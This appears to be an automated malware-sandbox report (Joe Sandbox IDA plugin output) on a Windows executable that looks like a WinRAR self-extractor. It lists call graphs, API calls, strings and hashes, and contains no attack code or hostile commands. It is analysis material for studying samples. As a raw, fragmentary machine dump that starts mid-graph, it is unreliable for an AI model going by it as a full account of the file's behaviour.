22868->22869 22870 87fa31 DeleteCriticalSection CloseHandle CloseHandle 22868->22870 22871 87fac7 70 API calls 22869->22871 22870->22865 22872 87fa1d CloseHandle 22871->22872 22872->22869 22872->22870 22873->22800 22874->22800 22890 8821e6 22875->22890 22877 885995 ___BuildCatchObject __vswprintf_c_l 22878 87c658 115 API calls 22877->22878 22879 885d67 22877->22879 22894 87fa67 22877->22894 22900 882b3a 115 API calls 22877->22900 22901 885db9 115 API calls 22877->22901 22902 87fdc9 22877->22902 22906 882593 92 API calls __vswprintf_c_l 22877->22906 22907 8863f2 120 API calls __vswprintf_c_l 22877->22907 22878->22877 22908 883ef1 92 API calls __vswprintf_c_l 22879->22908 22881 885d77 __vswprintf_c_l 22881->22809 22888->22809 22889->22809 22892 8821f0 __EH_prolog ___scrt_fastfail new 22890->22892 22891 8822db 22891->22877 22892->22891 22893 876e0b 68 API calls 22892->22893 22893->22892 22895 87fa73 22894->22895 22896 87fa78 22894->22896 22897 87fbb1 77 API calls 22895->22897 22898 87fa91 22896->22898 22899 87fdc9 72 API calls 22896->22899 22897->22896 22898->22877 22899->22898 22900->22877 22901->22877 22903 87fde3 ResetEvent ReleaseSemaphore 22902->22903 22904 87fe0e 22902->22904 22905 87fac7 70 API calls 22903->22905 22904->22877 22905->22904 22906->22877 22907->22877 22908->22881 22909->22541 22910->22541 22911->22543 22913 875da6 22912->22913 22986 875cc5 22913->22986 22915 875dd9 22917 875e1a 22915->22917 22919 875e11 22915->22919 22991 87a950 CharUpperW CompareStringW CompareStringW 22915->22991 22917->22919 22992 87f0e1 CompareStringW 22917->22992 22919->22554 22922 878116 22920->22922 22921 8781b7 CharUpperW 22923 8781ca 22921->22923 22922->22921 22923->22557 22925 877c20 22924->22925 22926 877c60 22925->22926 22998 876f49 67 API calls 22925->22998 22926->22564 22928 877c58 22999 876d0d 67 API calls 22928->22999 22931 877dce 22930->22931 22932 877f55 22931->22932 22933 879e86 9 API calls 22931->22933 22932->22571 22934 877e0b 22933->22934 22935 879dff 4 API calls 22934->22935 22937 877ef9 pre_c_initialization 22934->22937 22936 877e1b 22935->22936 22939 879e13 4 API calls 22936->22939 22944 877e61 22936->22944 22937->22932 23000 879f2a 22937->23000 22938 879cce 9 API calls 22940 877e71 22938->22940 22942 877e29 22939->22942 22943 879e86 9 API calls 22940->22943 22942->22944 23016 879161 89 API calls 22942->23016 22947 877e8e 22943->22947 22944->22938 22946 877ecf 22944->22946 22946->22937 22948 877f62 22946->22948 22949 877ee1 22946->22949 22947->22937 22952 879cce 9 API calls 22947->22952 23017 871f18 67 API calls 22948->23017 22949->22937 22951 87a0c3 4 API calls 22949->22951 22951->22937 22953 877eb2 22952->22953 22954 879e86 9 API calls 22953->22954 22954->22946 23018 879897 22955->23018 22958 879888 22958->22594 22961 879a23 22960->22961 22964 879a32 22960->22964 22962 879a29 FlushFileBuffers 22961->22962 22961->22964 22962->22964 22963 879aab SetFileTime 22963->22621 22964->22963 22965->22546 22966->22548 22967->22577 22968->22564 22969->22564 22970->22562 22971->22579 22972->22579 22974 879723 GetFileType 22973->22974 22975 879720 22973->22975 22976 879731 22974->22976 22975->22586 22976->22586 22977->22589 22978->22591 22979->22617 22980->22617 22981->22617 22982->22617 22983->22615 22984->22616 22985->22570 22993 875bc2 22986->22993 22988 875ce6 22988->22915 22990 875bc2 3 API calls 22990->22988 22991->22915 22992->22919 22994 875bcc 22993->22994 22996 875cb4 22994->22996 22997 87a950 CharUpperW CompareStringW CompareStringW 22994->22997 22996->22988 22996->22990 22997->22994 22998->22928 22999->22926 23001 879f34 23000->23001 23002 879e13 4 API calls 23001->23002 23003 879f98 23002->23003 23004 879fb3 CreateFileW 23003->23004 23006 87a0c3 4 API calls 23003->23006 23007 879fdf 23004->23007 23013 87a027 23004->23013 23006->23004 23008 87b275 2 API calls 23007->23008 23009 879ff5 23008->23009 23011 87a0b6 23009->23011 23012 879ffd CreateFileW 23009->23012 23010 87a060 SetFileTime CloseHandle 23010->23011 23014 87a0a6 23010->23014 23011->22932 23012->23011 23012->23013 23013->23010 23015 87a0c3 4 API calls 23014->23015 23015->23011 23016->22944 23017->22937 23019 87987d 23018->23019 23022 8798a3 23018->23022 23019->22958 23023 879b6a SetEndOfFile 23019->23023 23020 8798da SetFilePointer 23020->23019 23021 8798f8 GetLastError 23020->23021 23021->23019 23022->23020 23023->22958 23026 87a27d 23025->23026 23027 87a30d FindNextFileW 23026->23027 23028 87a29b FindFirstFileW 23026->23028 23029 87a32c 23027->23029 23030 87a318 GetLastError 23027->23030 23031 87a2b4 23028->23031 23036 87a2f1 23028->23036 23029->23036 23030->23029 23032 87b275 2 API calls 23031->23032 23033 87a2cd 23032->23033 23034 87a2e6 GetLastError 23033->23034 23035 87a2d1 FindFirstFileW 23033->23035 23034->23036 23035->23034 23035->23036 23036->22496 23046 888adf GetDC GetDeviceCaps ReleaseDC 23037->23046 23039 888ac7 23040 888ad3 23039->23040 23047 888b22 GetDC GetDeviceCaps ReleaseDC 23039->23047 23040->22186 23040->22187 23042->22190 23043->22196 23044->22196 23045->22199 23046->23039 23047->23040 23048->22207 23050 879ba2 67 API calls 23049->23050 23051 871ee9 23050->23051 23052 871eed 23051->23052 23053 8719b1 90 API calls 23051->23053 23052->22215 23052->22216 23054 871efa 23053->23054 23054->23052 23056 876d0d 67 API calls 23054->23056 23056->23052 23972 891b40 5 API calls 2 library calls 23944 889646 92 API calls 23125 88cd5c 23126 88cd66 23125->23126 23127 88cabc ___delayLoadHelper2@8 19 API calls 23126->23127 23128 88cd73 23127->23128 23912 88995f 104 API calls 23913 88955f 71 API calls 23887 87605e 73 API calls 23914 88d553 46 API calls 5 library calls 23973 897ede 27 API calls ___delayLoadHelper2@8 23889 871067 75 API calls pre_c_initialization 23974 891f60 RtlUnwind 23915 888963 GdipDisposeImage GdipFree pre_c_initialization 23975 88d779 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 23976 89d774 IsProcessorFeaturePresent 23787 88b077 23789 88b07c 23787->23789 23801 88aa99 _wcsrchr 23787->23801 23788 8896ec ExpandEnvironmentStringsW 23788->23801 23789->23801 23813 88b9aa 23789->23813 23791 88b642 23793 88ad86 SetWindowTextW 23793->23801 23796 8920de 22 API calls 23796->23801 23798 88ab77 SetFileAttributesW 23800 88ac32 GetFileAttributesW 23798->23800 23809 88ab6a ___scrt_fastfail 23798->23809 23803 88ac40 DeleteFileW 23800->23803 23800->23809 23801->23788 23801->23791 23801->23793 23801->23796 23805 88af50 GetDlgItem SetWindowTextW SendMessageW 23801->23805 23807 88af92 SendMessageW 23801->23807 23801->23809 23812 880b12 CompareStringW 23801->23812 23836 888b8e GetCurrentDirectoryW 23801->23836 23837 87a1a9 7 API calls 23801->23837 23840 87a132 FindClose 23801->23840 23841 889844 69 API calls new 23801->23841 23803->23809 23805->23801 23806 873f5b _swprintf 51 API calls 23808 88ac75 GetFileAttributesW 23806->23808 23807->23801 23808->23809 23810 88ac86 MoveFileW 23808->23810 23809->23798 23809->23800 23809->23801 23809->23806 23838 87b100 52 API calls 2 library calls 23809->23838 23839 87a1a9 7 API calls 23809->23839 23810->23809 23811 88ac9e MoveFileExW 23810->23811 23811->23809 23812->23801 23814 88b9b4 ___scrt_fastfail 23813->23814 23815 88ba9f 23814->23815 23821 88bc0c 23814->23821 23842 880b12 CompareStringW 23814->23842 23817 879dff 4 API calls 23815->23817 23818 88bab4 23817->23818 23819 88bad3 ShellExecuteExW 23818->23819 23843 87ae20 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23818->23843 23819->23821 23827 88bae6 23819->23827 23821->23801 23822 88bacb 23822->23819 23823 88bb21 23844 88be69 WaitForSingleObject PeekMessageW WaitForSingleObject 23823->23844 23824 88bb77 CloseHandle 23825 88bb90 23824->23825 23826 88bb85 23824->23826 23825->23821 23832 88bc07 ShowWindow 23825->23832 23845 880b12 CompareStringW 23826->23845 23827->23823 23827->23824 23829 88bb1b ShowWindow 23827->23829 23829->23823 23831 88bb39 23831->23824 23833 88bb4c GetExitCodeProcess 23831->23833 23832->23821 23833->23824 23834 88bb5f 23833->23834 23834->23824 23836->23801 23837->23801 23838->23809 23839->23809 23840->23801 23841->23801 23842->23815 23843->23822 23844->23831 23845->23825

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 0087F353: GetModuleHandleW.KERNEL32 ref: 0087F36B
                                                                                            • Part of subcall function 0087F353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0087F383
                                                                                            • Part of subcall function 0087F353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0087F3A6
                                                                                            • Part of subcall function 00888B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00888B96
                                                                                            • Part of subcall function 00889036: OleInitialize.OLE32(00000000), ref: 0088904F
                                                                                            • Part of subcall function 00889036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00889086
                                                                                            • Part of subcall function 00889036: SHGetMalloc.SHELL32(008B20E8), ref: 00889090
                                                                                            • Part of subcall function 00880722: GetCPInfo.KERNEL32(00000000,?), ref: 00880733
                                                                                            • Part of subcall function 00880722: IsDBCSLeadByte.KERNEL32(00000000), ref: 00880747
                                                                                          • GetCommandLineW.KERNEL32 ref: 0088C179
                                                                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0088C1A0
                                                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0088C1B1
                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0088C1EB
                                                                                            • Part of subcall function 0088BE0A: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0088BE20
                                                                                            • Part of subcall function 0088BE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0088BE5C
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0088C1F4
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,008C7938,00000800), ref: 0088C20F
                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxname,008C7938), ref: 0088C221
                                                                                          • GetLocalTime.KERNEL32(?), ref: 0088C228
                                                                                          • _swprintf.LIBCMT ref: 0088C267
                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0088C279
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0088C27C
                                                                                          • LoadIconW.USER32(00000000,00000064), ref: 0088C293
                                                                                          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 0088C2E4
                                                                                          • Sleep.KERNEL32(?), ref: 0088C312
                                                                                          • DeleteObject.GDI32 ref: 0088C351
                                                                                          • DeleteObject.GDI32(?), ref: 0088C35D
                                                                                            • Part of subcall function 0088A8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 0088A92C
                                                                                            • Part of subcall function 0088A8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0088A953
                                                                                          • CloseHandle.KERNEL32 ref: 0088C39C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                          • API String ID: 985665271-3710569615
                                                                                          • Opcode ID: a3c688c7fc75de1ba3cc6000023eec2717be155e02c99514cb918d5769d37d9f
                                                                                          • Instruction ID: 51deee4c63a508f772bde9c4278b2135ad9ed4f8392f0a6aa5bafc6b51d0f0bf
                                                                                          • Opcode Fuzzy Hash: a3c688c7fc75de1ba3cc6000023eec2717be155e02c99514cb918d5769d37d9f
                                                                                          • Instruction Fuzzy Hash: E161E371904310AFE320BB69EC49F6B3BE8FB49751F044429F544D36A2EB789805CBB2

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 598 888bd0-888beb FindResourceW 599 888bf1-888c03 SizeofResource 598->599 600 888cc6-888cc8 598->600 601 888c23-888c25 599->601 602 888c05-888c14 LoadResource 599->602 604 888cc5 601->604 602->601 603 888c16-888c21 LockResource 602->603 603->601 605 888c2a-888c3f GlobalAlloc 603->605 604->600 606 888cbf-888cc4 605->606 607 888c41-888c4a GlobalLock 605->607 606->604 608 888cb8-888cb9 GlobalFree 607->608 609 888c4c-888c6a call 88e000 CreateStreamOnHGlobal 607->609 608->606 612 888c6c-888c84 call 888b65 609->612 613 888cb1-888cb2 GlobalUnlock 609->613 612->613 617 888c86-888c8e 612->617 613->608 618 888ca9-888cad 617->618 619 888c90-888ca4 GdipCreateHBITMAPFromBitmap 617->619 618->613 619->618 620 888ca6 619->620 620->618
                                                                                          APIs
                                                                                          • FindResourceW.KERNELBASE(00000066,PNG,?,?,00889AC8,00000066), ref: 00888BE1
                                                                                          • SizeofResource.KERNEL32(00000000,75295780,?,?,00889AC8,00000066), ref: 00888BF9
                                                                                          • LoadResource.KERNEL32(00000000,?,?,00889AC8,00000066), ref: 00888C0C
                                                                                          • LockResource.KERNEL32(00000000,?,?,00889AC8,00000066), ref: 00888C17
                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00889AC8,00000066), ref: 00888C35
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00888C42
                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00888C62
                                                                                          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00888C9D
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00888CB2
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00888CB9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                          • String ID: PNG
                                                                                          • API String ID: 3656887471-364855578
                                                                                          • Opcode ID: 03d9eb6a713a02cbc3fca7571fd61771e812cb3d4a540e96c1adeb407954ba5b
                                                                                          • Instruction ID: 127699b3b6247c5ecde0a2c41533a8ada9ac1cd10b78531a28f57a0291fe92cc
                                                                                          • Opcode Fuzzy Hash: 03d9eb6a713a02cbc3fca7571fd61771e812cb3d4a540e96c1adeb407954ba5b
                                                                                          • Instruction Fuzzy Hash: FF216F71602602EFE761AF21DD4996BBBA9FF8A791B000528F845C2664EF31DC04DBB1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 860 87a273-87a299 call 88cec0 863 87a30d-87a316 FindNextFileW 860->863 864 87a29b-87a2ae FindFirstFileW 860->864 865 87a32c-87a32e 863->865 866 87a318-87a326 GetLastError 863->866 867 87a334-87a3dd call 87f10e call 87b902 call 8801c1 * 3 864->867 868 87a2b4-87a2cf call 87b275 864->868 865->867 869 87a3e2-87a3f5 865->869 866->865 867->869 875 87a2e6-87a2ef GetLastError 868->875 876 87a2d1-87a2e4 FindFirstFileW 868->876 878 87a2f1-87a2f4 875->878 879 87a300 875->879 876->867 876->875 878->879 882 87a2f6-87a2f9 878->882 880 87a302-87a308 879->880 880->869 882->879 884 87a2fb-87a2fe 882->884 884->880
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A2A8
                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A2DE
                                                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A2E6
                                                                                          • FindNextFileW.KERNEL32(?,?,?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A30E
                                                                                          • GetLastError.KERNEL32(?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A31A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$ErrorFirstLast$Next
                                                                                          • String ID:
                                                                                          • API String ID: 869497890-0
                                                                                          • Opcode ID: 8df4775df3f355a065e27014e8a1d787e3a836bc02dd41e9ea3ef74584d84cb0
                                                                                          • Instruction ID: d3ae55a57e08be297b23b88c56970e10a5a01cf7ac5fa08a21f0b663fc4b48bc
                                                                                          • Opcode Fuzzy Hash: 8df4775df3f355a065e27014e8a1d787e3a836bc02dd41e9ea3ef74584d84cb0
                                                                                          • Instruction Fuzzy Hash: 2C415175608245AFC324EF68C884ADEF7E9FB89350F004A1AF5ADD3240D774E9548B92
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(?,?,00894A30,?,008A7F68,0000000C,00894B87,?,00000002,00000000), ref: 00894A7B
                                                                                          • TerminateProcess.KERNEL32(00000000,?,00894A30,?,008A7F68,0000000C,00894B87,?,00000002,00000000), ref: 00894A82
                                                                                          • ExitProcess.KERNEL32 ref: 00894A94
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: 70b77aaad5bbfab04cab5839310f23d6da033135ecce8fba728acc4d91e9f556
                                                                                          • Instruction ID: 343f0509dedf9459250f4448a254e60e1bfe330d06862efcf83a8e59c5d650b5
                                                                                          • Opcode Fuzzy Hash: 70b77aaad5bbfab04cab5839310f23d6da033135ecce8fba728acc4d91e9f556
                                                                                          • Instruction Fuzzy Hash: 90E0B631140918AFDF51BF68DD09E893BA9FB51391F091414F9099AA21CB36DD92CB85
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 0087840E
                                                                                          • _memcmp.LIBVCRUNTIME ref: 00878870
                                                                                            • Part of subcall function 008780F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,008786E9,?,-00000930,?), ref: 008781BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharH_prologUpper_memcmp
                                                                                          • String ID:
                                                                                          • API String ID: 4047935103-0
                                                                                          • Opcode ID: 950891d690957e33aad25b8920bf7c161aeb2290a3a16b7554e3d97a9dc9a5dc
                                                                                          • Instruction ID: 1f1dd7d83af5b2fdd5017d0e1a02657476c34db3db6962b4f184e5fb841a19d8
                                                                                          • Opcode Fuzzy Hash: 950891d690957e33aad25b8920bf7c161aeb2290a3a16b7554e3d97a9dc9a5dc
                                                                                          • Instruction Fuzzy Hash: D172F571944185EEDF25DF64C889BE9BBA8FF11304F0880B9E95DDB14ADB30DA84CB61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 27646c26781a14badac0986e8ee5c57c876c39f6d3edd26049b5c32271f0ecdf
                                                                                          • Instruction ID: f562900aa78777c0af2cf400b3d4937ec96d382d3ad26850211d6a9105e10020
                                                                                          • Opcode Fuzzy Hash: 27646c26781a14badac0986e8ee5c57c876c39f6d3edd26049b5c32271f0ecdf
                                                                                          • Instruction Fuzzy Hash: B5D113B1A087458FDB14EF28C88479ABBE1FF95318F08056DE844DB642D334E959CB9A
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00889B54
                                                                                            • Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
                                                                                            • Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prologItemTextWindow
                                                                                          • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                          • API String ID: 810644672-2803697902
                                                                                          • Opcode ID: 78fd1134e56c1a7cc3a15fbba7202aa54d6f24ef97007c228dd668e1ff5f73d2
                                                                                          • Instruction ID: 12bc32fa261fc2f4c5f8f4c8fdb06bbc573c6b163bba8aae3fd6ca2993e467ad
                                                                                          • Opcode Fuzzy Hash: 78fd1134e56c1a7cc3a15fbba7202aa54d6f24ef97007c228dd668e1ff5f73d2
                                                                                          • Instruction Fuzzy Hash: 6D421270A40318AEFB25BB689C4AFBE3BA8FB06710F044055F645E65D2D7B59D84CB23

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 257 87f353-87f375 call 88cec0 GetModuleHandleW 260 87f377-87f38e GetProcAddress 257->260 261 87f3c8-87f62f 257->261 264 87f3a0-87f3aa GetProcAddress 260->264 265 87f390-87f39d 260->265 262 87f635-87f640 call 89462a 261->262 263 87f6fd-87f72e GetModuleFileNameW call 87b88c call 87f10e 261->263 262->263 273 87f646-87f673 GetModuleFileNameW CreateFileW 262->273 277 87f730-87f73a call 87a8e0 263->277 264->261 268 87f3ac-87f3c3 264->268 265->264 268->261 275 87f675-87f683 SetFilePointer 273->275 276 87f6f1-87f6f8 CloseHandle 273->276 275->276 278 87f685-87f6a2 ReadFile 275->278 276->263 283 87f747 277->283 284 87f73c-87f740 call 87f309 277->284 278->276 280 87f6a4-87f6c9 278->280 282 87f6e6-87f6ef call 87ef07 280->282 282->276 292 87f6cb-87f6e5 call 87f309 282->292 287 87f749-87f74b 283->287 289 87f745 284->289 290 87f76d-87f78f call 87b902 GetFileAttributesW 287->290 291 87f74d-87f76b CompareStringW 287->291 289->287 294 87f791-87f795 290->294 299 87f799 290->299 291->290 291->294 292->282 294->277 297 87f797 294->297 300 87f79d-87f7a2 297->300 299->300 301 87f7d6-87f7d8 300->301 302 87f7a4 300->302 304 87f8e5-87f8ef 301->304 305 87f7de-87f7f5 call 87b8d6 call 87a8e0 301->305 303 87f7a6-87f7c8 call 87b902 GetFileAttributesW 302->303 311 87f7d2 303->311 312 87f7ca-87f7ce 303->312 315 87f7f7-87f858 call 87f309 * 2 call 87d142 call 873f5b call 87d142 call 888ccb 305->315 316 87f85d-87f890 call 873f5b AllocConsole 305->316 311->301 312->303 314 87f7d0 312->314 314->301 322 87f8dd-87f8df ExitProcess 315->322 321 87f892-87f8d7 GetCurrentProcessId AttachConsole call 8920b3 GetStdHandle WriteConsoleW Sleep FreeConsole 316->321 316->322 321->322
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32 ref: 0087F36B
                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0087F383
                                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0087F3A6
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0087F651
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0087F669
                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0087F67B
                                                                                          • ReadFile.KERNEL32(00000000,?,00007FFE,008A0858,00000000), ref: 0087F69A
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0087F6F2
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0087F708
                                                                                          • CompareStringW.KERNEL32(00000400,00001001,008A08A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 0087F762
                                                                                          • GetFileAttributesW.KERNELBASE(?,?,008A0870,00000800,?,00000000,?,00000800), ref: 0087F78B
                                                                                          • GetFileAttributesW.KERNEL32(?,?,008A0930,00000800), ref: 0087F7C4
                                                                                            • Part of subcall function 0087F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0087F324
